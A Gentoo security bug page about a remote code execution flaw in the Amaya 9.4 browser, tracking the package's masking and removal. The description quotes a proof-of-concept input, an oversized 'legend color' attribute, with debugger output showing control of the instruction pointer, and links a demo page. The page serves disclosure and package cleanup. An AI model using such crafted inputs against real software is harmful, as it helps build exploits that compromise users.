Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 129874 - www-client/amaya: <= 9.4 Remote Code Execution
Summary: www-client/amaya: <= 9.4 Remote Code Execution
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High enhancement (vote)
Assignee: Gentoo Security
URL: http://morph3us.org/advisories/200604...
Whiteboard: B2 [masked] ed PENDING REMOVAL Oct 16th
Keywords: PMASKED
: 130900 (view as bug list)
Depends on: 83394
Blocks:
  Show dependency tree
 
Reported: 2006-04-13 15:38 UTC by Eduardo Tongson
Modified: 2006-11-04 11:36 UTC (History)
3 users (show)

See Also:
Package list:
Runtime testing required: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Eduardo Tongson 2006-04-13 15:38:12 UTC 
Amaya <= 9.4 susceptible to remote code execution. 
Since Amaya is unmaintained. I suggest that it be masked.

"""snip"""
The following code snippet forces Amaya 9.4 to crash:
> <legend color="Ax200">

> eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000
> edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
> cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000  efl=00010206
>
>         00516114 56               push    esi
>         00516115 57               push    edi
>         00516116 33ff             xor     edi,edi
>         00516118 33f6             xor     esi,esi
>         0051611a 3bcf             cmp     ecx,edi
>         0051611c 893d943df101     mov     [amaya+0x1b13d94
>                                             (01f13d94)],edi
>         00516122 7511             jnz     amaya+0x116135 (00516135)
>         00516124 6a0a             push    0xa
>         00516126 e825d80500       call    amaya+0x173950 (00573950)
>         0051612b 83c404           add     esp,0x4
>         0051612e 8bd7             mov     edx,edi
>         00516130 8bc6             mov     eax,esi
>         00516132 5f               pop     edi
>         00516133 5e               pop     esi
>         00516134 c3               ret
> FAULT ->00516135 8b4134           mov     eax,[ecx+0x34]
>                                             ds:0023:41414175=????????
>         00516138 3bc7             cmp     eax,edi
>         0051613a 74f2             jz      amaya+0x11612e (0051612e)
>         0051613c 8b4938           mov     ecx,[ecx+0x38]
>         0051613f 5f               pop     edi
>         00516140 8bd1             mov     edx,ecx
>         00516142 5e               pop     esi
>         00516143 c3               ret
>         Nopslide..

We are able to control the EIP:
> <legend color=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAABBBB>

> eax=0ade6e01 ebx=0ac7da00 ecx=0ade6e28 edx=1bce0002 esi=007de85a
> edi=01aeb154 eip=42424242 esp=0012e79c ebp=007da170 iopl=0
> cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000  efl=00000202
>
> Funktion: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???

Online-demo:
http://morph3us.org/security/pen-testing/amaya/amaya-94-legend-color.html
"""snip"""
Comment 1 Thierry Carrez (RETIRED) gentoo-dev 2006-04-15 05:49:10 UTC 
We should post a call to -dev to find some maintainer here.
Comment 2 Thierry Carrez (RETIRED) gentoo-dev 2006-04-22 03:19:49 UTC 
Call for maintainer posted
Comment 3 Jakub Moc (RETIRED) gentoo-dev 2006-04-22 23:48:56 UTC 
*** Bug 130900 has been marked as a duplicate of this bug. ***
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2006-04-28 12:17:32 UTC 
We have an ebuild but nobody wants to maintain this. I vote for masking...
Comment 5 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-04-28 21:55:42 UTC 
I'm for masking as well.
Comment 6 Stefan Cornelius (RETIRED) gentoo-dev 2006-04-30 06:15:02 UTC 
masked it, keeping the bug open as enhancement until we have a fix or remove the package.
Comment 7 Alec Warner (RETIRED) archtester gentoo-dev Security 2006-08-03 16:20:05 UTC 
(In reply to comment #6)
> masked it, keeping the bug open as enhancement until we have a fix or remove
> the package.
> 

treecleaners would like to remove the package.
Comment 8 Christian Heim (RETIRED) gentoo-dev 2006-11-04 11:36:11 UTC 
www-client/amaya is removed!